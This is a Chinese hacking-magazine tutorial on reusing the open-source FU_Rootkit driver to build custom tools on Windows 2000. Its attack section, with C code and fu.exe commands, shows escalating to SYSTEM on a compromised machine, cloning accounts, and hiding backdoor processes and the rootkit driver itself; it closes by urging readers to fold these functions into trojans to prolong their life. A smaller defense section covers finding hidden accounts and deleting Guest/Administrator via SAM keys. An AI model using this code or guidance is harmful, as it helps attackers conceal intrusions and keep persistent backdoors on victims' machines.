养在深闺人未识:FU_Rootkit
养在深闺人未识:FU_Rootkit
发布时间:2016-12-26 来源:查字典编辑
摘要:我在2004年11期黑防上刊登了《小工具巧删Guest/Administrator账户》这篇文章,有不少朋友来信询问工具是如何编写的,其实这...

我在2004年11期黑防上刊登了《小工具巧删Guest/Administrator账户》这篇文章,有不少朋友来信询问工具是如何编写的,其实这个工具里面大部分代码是我拷贝FU_Rootkit过来的。既然朋友们喜欢,这几天我又多了好多想法,那我就来讲讲怎么充分挖掘利用FU_Rootkit吧!

先去www.rootkit.com把FU_Rootkit给Down下来,以前它在Windows2000专业版下面提升进程权限有问题,新版本已经修复这个问题。FU_Rootkit也算是“养在深闺人未识”了,比起Hxdef、AFXRootKit来名气小多了,不过是金子终究是要发光的,这不,今天我们就让它来发光了!

FU_Rootkit是开源的,用C语言编写,很容易移植。我的开发环境是Windows2000+SP4+VC6.0。FU_Rootkit主程序包括2个部分:Fu.exe和Msdirectx.sys。Msdirectx.sys能直接载入核心内存,Fu.exe则是相应的应用程序。先来看看它的部分功能:

[-pl]xxx列举所有运行进程

[-ph]#PID隐藏进程标识符为PID的进程

[-pld]列举所有载入驱动程序

[-phd]DRIVER_NAME隐藏指定驱动

[-pas]#PID提升进程标识符为PID的进程权限至SYSTEM

[-prl]列出可用的权限名单

[-prs]#PID#privilege_name提升进程标识符为PID的进程权限至指定权限

[-pss]#PID#account_name改变进程令牌和SID

可以看出FU_Rootkit不仅可以隐藏进程和驱动,改变进程令牌和SID,还可以例举用Hook技术隐藏的进程和驱动。我们今天要做的就是利用Msdirectx.sys完成我们自己的黑客工具集的编写!

权限提升

有了权限我们才能任意地操作,让电脑为我们实现各种功能,所以第一步首先是权限提升。

我们知道,提升进程权限可以用Psu工具,FU_Rootkit也能够实现这个功能,它可以将任意进程提升到SYSTEM权限——不光可以给其它进程提升权限,还可以把自己的进程也提升为SYSTEM权限哦(在下面的文章中你将可以看到这个功能是多么的有用)!

第一步:载入Msdirectx.sys

具体代码见InitDriver()函数。其实朋友们大可不必完全看懂这些代码,把函数直接拷贝过去就OK了。

第二步:查找进程的PID

代码如下:

constcharDESTPROC[19]="UserManager.exe";//UserManager.exe是程序的进程名称

AddPrivilege(SE_DEBUG_NAME);//提升进程DEBUG权限

HANDLEhRemoteProcess=NULL;

DWORDpid=ProcessToPID(DESTPROC);//这里的pid就是我们进程PID

//ProcessToPID函数如下:

DWORDProcessToPID(constchar*InputProcessName)

//将进程名转换成进程PID的函数

{

DWORDaProcesses[1024],cbNeeded,cProcesses;

unsignedinti;

HANDLEhProcess=NULL;

HMODULEhMod=NULL;

charszProcessName[MAX_PATH]="UnknownProcess";

//提升进程权限至DEBUG权限

AddPrivilege(SE_DEBUG_NAME);

//计算目前有多少进程,aProcesses[]用来存放有效的进程PIDs

if(!EnumProcesses(aProcesses,sizeof(aProcesses),&cbNeeded))

{

return0;

}

cProcesses=cbNeeded/sizeof(DWORD);

//按有效的PID遍历所有的进程

for(i=0;i<cProcesses;i++)

{

//打开特定PID的进程

hProcess=OpenProcess(PROCESS_QUERY_INFORMATION|

PROCESS_VM_READ,

FALSE,aProcesses[i]);

//取得特定PID的进程名

if(hProcess)

{

if(EnumProcessModules(hProcess,&hMod,sizeof(hMod),&cbNeeded))

{

GetModuleBaseName(hProcess,hMod,szProcessName,sizeof(szProcessName));

//将取得的进程名与输入的进程名比较,如相同则返回进程PID

if(!stricmp(szProcessName,InputProcessName))

{

CloseHandle(hProcess);

returnaProcesses[i];

}

}

}//endofif(hProcess)

}//endoffor

//没有找到相应的进程名,返回0

CloseHandle(hProcess);

return0;

}

第三步:提升进程权限至SYSTEM

具体代码见UpdateToSystem()函数。这样我们的进程UserManager.exe就具备了SYSTEM权限了。

攻击篇

当你得到肉鸡的SYSTEM权限后,当然要把自己的后门进程或驱动器隐藏,然后克隆账号,留个隐藏账号什么的,下面我们就来看看这些功能如何用程序来实现。

1.克隆帐号

各位朋友看到小榕的CA工具是不是很眼馋,想不想自己写一个?在黑防2003年的第7期《C语言克隆账号》上已经有具体介绍。一般来讲,克隆账号的方法有2种:一种是利用系统服务的SYSTEM权限读写SAM文件;第二种是利用驱动提升进程权限。我们这里采用第二种办法。在《C语言克隆账号》一文中,由于其不具备SYSTEM权限,需要手工修改注册表才能够操作注册表SAM文件夹,比较麻烦。在我们这里当然是没有问题的,将其代码COPY过来,粘在我们工程里面就可以了。

2.进程隐藏

进程隐藏实乃木马病毒的必备防身本领,FU_Rootkit中的最基本功能之一就是进程隐藏,首先我们要知道进程的PID或者进程名,然后才能将它隐藏,隐藏代码如下:

DWORDHideProc(DWORDpid)//pid是你要隐藏的进程的PID

{

DWORDd_bytesRead;

DWORDsuccess;

if(!Initialized)

{

returnERROR_NOT_READY;

}

success=DeviceIoControl(gh_Device,

IOCTL_ROOTKIT_HIDEME,

(void*)&pid,

sizeof(DWORD),

NULL,

0,

&d_bytesRead,

NULL);

returnsuccess;

}

假如你要想找出隐藏的进程,可以采用工具RTDector0.62工具,黑防以前就介绍过。

3.驱动隐藏

驱动隐藏?很少见吧。有经验的管理员一般都会使用命令Drivers.exe来查看载入的驱动(Drivers.exe可以在Windows2000的资源包里面找到),

看到Msdirectx.sys暴露出来了吧?而FU_Rootkit就可以把自己的Msdirectx.sys隐藏起来,运行的命令是:“C:fu.exe–phdmsdirectx.sys”。当然这个功能我们也可以很轻松地移植到我们的程序中去。

防御篇

千万不要以为FU_Rootkit得到SYSTEM权限只是用来攻击,不能防守,其实Rootkit是一把“双刃剑”,运用得当,同样是防御的好帮手。同时,作为一名菜鸟,当然是防守为先,所以请看防守篇。

1.系统用户查看

眼下只要翻开一本黑客杂志,经常看到什么“隐藏帐号”、“不死帐号”什么的,吓得我等菜鸟心惊胆颤,经常对着用户管理发呆,究竟有没有问题呢?这里我们可以利用LPUSER_INFO_3读取用户信息,包括用户名、用户全名、用户描述、登录次数、登录权限以及上次登录时间等参数,代码较长而且简单,这里就不贴了,有兴趣的可以查看DWORDCUserManagerDlg::UserALLE()函数。

当然,列举账号可以直接从SAMSAMDomainsAccountUsersNames中读取,然后与LPUSER_INFO_3中读出来的账号进行对比,这样就能找出隐藏的账号,将那些隐藏的、不死的统统打回原形,让你把账号看得“清清楚楚,明明白白”。

2.删除Guest

先来看看如何删除Guest用户吧。获取SYSTEM权限后,只要删除在注册表SAM文件夹中对应的Guest和000001F5文件夹就OK了!

voidCUserManagerDlg::Deleteguest()

{

BOOLupResult;

upResult=UpdateToSystem();

//先查看一下进程提示权限至SYSTEM成功没有

if(upResult)//如果权限提升SYSTEM成功的话

{

//删除GUEST用户!

BOOLdResult;

dResult=DelNT(HKEY_LOCAL_MACHINE,"SAMSAMDomainsAccountUsersNamesGuest");//删除Guest文件夹

BOOLdResult2;

dResult2=DelNT(HKEY_LOCAL_MACHINE,"SAMSAMDomainsAccountUsers00001F5");//删除guest对应的ID号000001F5文件夹

if(dResult&&dResult2)

{

AfxMessageBox("成功删除GUEST用户!");

}

else

{

AfxMessageBox("删除GUEST用户失败!");

}

}

else

{

AfxMessageBox("提升至SYSTEM权限失败!");

}

}

其中DelNT()函数是专门定义用来删除注册表子键的函数。

3.删除Administrator

看到标题你可不要吓一跳,Administrator一般情况下是不能删除的,当然你可以到控制面板->管理工具->计算机管理里面重命名该账户,也可以使用NTResourceKit提供的Passprop工具启用对Administrator的锁定。我们这里当然要挑战极限:删除Administrator!代码跟删除Guest用户的代码差不多,换个参数就可以了,分别删除注册表SAM文件夹中的Administrator和000001F4文件夹就可以了。而且可以在Administrator当前用户下删除,强吧?嘿嘿。假如你只有这么一个管理员账号的话呢,不好意思,恭喜你:你的机器上从此没有管理员了!

小提示:强烈建议删除Administrator之前一定要先创建一个其它名字的管理员账号!据《微软信息安全文集》中说,删除Administrator和Guest系统内置账户有可能导致破坏SAM数据库,不过《微软信息安全文集》的作者同时声明:经他测试,没有发现副作用。

4.查杀进程篇

朋友们是否经常遇到这种情况:在任务管理器中发现一个未知进程,并且杀不掉,说是权限不够,这个问题在我们获取System权限后就不再是问题,现在病毒、木马等都是双进程,互相监控,给我们查杀进程带来很大不便,需要我们能够同时查杀多个进程。选用Listview控件作为进程的列举控件,将Checkbox选项选中,这样我们就可以同时选中多个进程进行查杀,爽吧?!

5.列举用Hook技术隐藏的进程和驱动

这个功能就是FU_Rootkit的过人之处了,可以帮助你查找利用HOOK技术隐藏的进程和木马。实现方法比较简单,大家可以去源码中查看ListProc(void*buffer,intbuff_size)和ListDriv(void)函数。

本文利用FU_Rootkit获取SYSTEM权限后,完成了很多实用的黑客小工具,System和Administrator权限一般人看起来感觉都差不多,但在一些与系统内核交互的细节上,可以看出System权限要更大一些。譬如说注册表中的某些文件夹、对物理内存有读写能力等方面。因此,获取System权限后所能做的事情远远不止我们上面所说的这些,希望大家共同挖掘。

http://www.rootkit.com/上有很多开源的好资源,研究并扩展其功能便可以写出很多有用的小软件。将其功能添加到我们小马中去,将会大大提高其生命力。朋友们,现在是不是感觉黑客软件不过如此,人人能写?如果是这样,也不枉费我一番苦心。由于工作关系,时间确实有限,不可能将上面的功能全部一一实现在代码中,其实已经是体力活了,很多功能都只需要把代码COPY进去就可以了。特将删除Guest/Administrator的小工具和FU_Rootkit的代码附上,朋友们升级了可要寄给我一份哦!

推荐文章
猜你喜欢
附近的人在看
推荐阅读
拓展阅读
相关阅读
网友关注
最新漏洞研究学习
热门漏洞研究学习
实用技巧子分类